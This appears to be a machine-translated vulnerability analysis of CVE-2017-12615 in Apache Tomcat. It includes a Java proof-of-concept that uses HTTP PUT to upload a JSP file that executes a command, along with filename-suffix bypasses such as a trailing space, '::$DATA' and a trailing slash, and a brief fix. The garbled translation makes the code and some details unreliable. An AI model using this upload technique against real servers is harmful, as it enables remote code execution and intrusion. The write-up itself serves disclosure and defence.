Apache Tomcat cve-2017-12615 Remote Code Execution Vulnerability Analysis

September 19, 2017, Apache Tomcat officially released two serious security vulnerabilities, in which cve-2017-12615 is a remote code execution vulnerability, uploading a malicious JSP file to the server through a put request, and then executing arbitrary code on the server through a JSP file. And the latest patch does not completely fix the vulnerability. Beijing will continue to pay attention to this vulnerability, and the first time for you to update the relevant vulnerability information.

Vulnerability number

cve-2017-12615

Vulnerability Name

Apache Tomcat Remote Code Execution vulnerability

Vulnerability Rating

Serious

Impact Range

Apache Tomcat 7.0.0-7.0.79

Vulnerability Analysis 1. Creating a debugging environment

Download Tomcat v7.0.79 source code, Http://archive.apache.org/dist/tomcat/tomcat-7/v7.0.79/src/apache-tomcat-7.0.79-src.zip
After unpacking, create the Pom.xml file in the Jiebaugen directory and add the following:

<?xml version= "1.0" encoding= "UTF-8"?>
<!--suppress All--
<project xmlns= "http://maven.apache.org/POM/4.0.0"
Xmlns:xsi= "Http://www.w3.org/2001/XMLSchema-instance"
xsi:schemalocation= "http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd" >
<modelVersion>4.0.0</modelVersion>
<groupId>org.apache.tomcat</groupId>
<artifactId>Tomcat7.0.79</artifactId>
<name>tomcat7.0.79 src</name>
<version>7.0.79</version>
...........
</project>

To modify Conf/web.xml, add the following:

<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>

Idea Open Pom.xml file
The startup items are configured as follows

2. Do not add content after JSP

Package com.zxsoft;
Import Java.io.File;
Import Java.io.FileInputStream;
Import java.io.IOException;
Import Java.io.InputStream;
Import Java.io.OutputStream;
Import java.net.InetAddress;
Import Java.net.Socket;
Import com.sun.jersey.api.client.Client;
Import Com.sun.jersey.api.client.WebResource;
Import sun.net.www.http.HttpClient;
public class tomcatexp{
public static void Main (string[] args) throws Exception {
Socket s = new socket ("localhost", 8080);
OutputStream out = S.getoutputstream ();
String spayload = "<%process proc = Runtime.getruntime (). EXEC (\" calc\ ");%>";
Payload1
String head = "put/upload/" + "1.jsp" + "http/1.1\r\n" + "Host:" + "localhost:8080" + "\ r \ n"
+ "connection:keep-alive\r\n" + "accept:text/html,application/xhtml+xml,application/xml,*/*\r\n"
+ "Accept-encoding:gzip, deflate\r\n" + "accept-language:zh-cn\r\n" + "Content-length:"
+ spayload.length () + "\ r \ n" + "\ r \ n";
Out.write (Head.getbytes ());
Out.write (Spayload.getbytes (), 0, Spayload.length ());
S.close ();
}
}

Unable to create file when entering Jspservlet

3. jsp Add \string head = "put/upload/" + "1.jsp%7c" + "http/1.1\r\n" + "Host:" + "localhost:8080" + "\ r \ n"

Enter Defaultservlet

Judging readonly parameters

Write a file

Prompt exception, syntax error

4. JSP add space after string head = "put/upload/" + "1.jsp%20" + "http/1.1\r\n" + "Host:" + "localhost:8080" + "\ r \ n"

Enter Defaultservlet
File creation succeeded

Add to. (dot) similarly

5. Add after JSP:: $DATA

String head = "put/upload/" + "1.jsp:: $DATA" + "http/1.1\r\n" + "Host:" + "localhost:8080" + "\ r \ n"

Enter Defaultservlet
File creation succeeded

6. Add after JSP/

String head = "put/upload/" + "1.jsp/" + "http/1.1\r\n" + "Host:" + "localhost:8080" + "\ r \ n"

Get rid of the last/last successful file creation

7.7.0.81 version

The case of spaces, Canpath and abspath are not the same, return null, bug fix

:: $DATA situation, Canpath is empty, bug fixes

/, the file is still successfully returned, the vulnerability is not fixed

Exploit exploits

Access JSP file, execute code successfully

Fix suggestions

The Conf/web.xml file ReadOnly property value is set to Ture.

Apache Tomcat cve-2017-12615 Remote Code execution Vulnerability Analysis